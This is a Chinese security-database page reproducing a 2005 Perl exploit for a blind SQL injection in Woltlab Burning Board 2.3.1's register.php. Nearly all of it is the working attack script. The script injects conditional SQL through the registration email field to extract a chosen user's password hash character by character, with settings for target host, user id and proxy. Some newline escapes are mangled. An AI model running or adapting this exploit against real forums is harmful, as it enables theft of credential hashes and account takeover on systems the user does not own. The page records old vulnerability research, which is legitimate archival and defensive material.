Woltlab Burning Board 2.3.1 – ‘register.php’ SQL Injection

Woltlab Burning Board 2.3.1 – ‘register.php’ SQL Injection

漏洞ID 1055117 漏洞类型
发布时间 2005-05-20 更新时间 2005-05-20
图片[1]-Woltlab Burning Board 2.3.1 – ‘register.php’ SQL Injection-安全小百科CVE编号 N/A
图片[2]-Woltlab Burning Board 2.3.1 – ‘register.php’ SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1006
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

use strict;
use IO::Socket::INET;


$| = print "
Woltlab Burning Board <= 2.3.1 Exploit
Vulnerability discovered by GulfTech Security Research
Visit www.security-project.org
Exploit by deluxe89
----------
";



my $host = 'www.security-project.org';
my $path = '/wbb2/'; # path to the board
my $userid = 1; # the password hash will be from the user with this id
my $username = 'deluxe89'; # any username from the board
my $proxy = ''; # proxy, you can leave this empty
my $error = 'E-Mail-Adresse ist unzulässig'; # use 'email address entered is already ta' for english boards


# proxy handling
my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);
if($proxy ne '')
{
       print "[~] Using a proxyn";
}
else
{
       print "[~] You're using NO proxy!n";
       sleep(1);
}





#
# Get the hash
#

print "[~] Getting the hash. Please wait some minutes..n[+] Hash: ";


my $hash = '';
for(my $i=1;$i<33;$i++)
{
       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('[-] Could not connect to server');

       if(&test($i, 96)) # buchstabe
       {
               for(my $c=97;$c<103;$c++)
               {
                       if(&test($i, $c, 1))
                       {
                               print pack('c', $c);
                               last;
                       }
               }
       }
       else # zahl
       {
               #print "0-4n";
               for(my $c=48;$c<58;$c++)
               {
                       if(&test($i, $c, 1))
                       {
                               print pack('c', $c);
                               last;
                       }
               }
       }
}
print "n";


sub test
{
       my ($i, $num, $g) = @_;

       my $sock = new IO::Socket::INET(PeerAddr => $addr, PeerPort => $port, Proto => 'tcp', Timeout => 8) or die('Could not connect to server');
       my $value = "[email protected]' OR (userid=$userid AND ascii(substring(password,$i,1))";
       $value .= ($g) ? '=' : '>';
       $value .= "$num)/*";
       my $data = "r_username=$username&r_email=$value&r_password=aaaaaaaa&r_confirmpassword=aaaaaaaa&r_homepage=&r_icq=&r_aim=&r_yim=&r_msn=&r_day=0&r_month=0&r_year=&r_gender=0&r_signature=&r_usertext=&field%5B1%5D=&field%5B2%5D=&field%5B3%5D=&r_invisible=0&r_usecookies=1&r_admincanemail=1&r_showemail=1&r_usercanemail=1&r_emailnotify=0&r_notificationperpm=0&r_receivepm=1&r_emailonpm=0&r_pmpopup=0&r_showsignatures=1&r_showavatars=1&r_showimages=1&r_daysprune=0&r_umaxposts=0&r_threadview=0&r_dateformat=d.m.Y&r_timeformat=H%3Ai&r_startweek=1&r_timezoneoffset=1&r_usewysiwyg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer=viewed";

       print $sock "POST http://$host${path}register.php HTTP/1.1rnHost: $hostrnConnection: ClosernContent-Type: application/x-www-form-urlencodedrnContent-Length: ".length($data)."rnrn$datarn";


       while(<$sock>)
       {
               if($_ =~ m/$error/) { return 1; }
       }
       return 0;
}

# milw0rm.com [2005-05-20]

相关推荐: Musicqueue SIGSEGV Signal Handler Insecure File Creation Vulnerability

Musicqueue SIGSEGV Signal Handler Insecure File Creation Vulnerability 漏洞ID 1099358 漏洞类型 Design Error 发布时间 2003-10-27 更新时间 2003-10…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享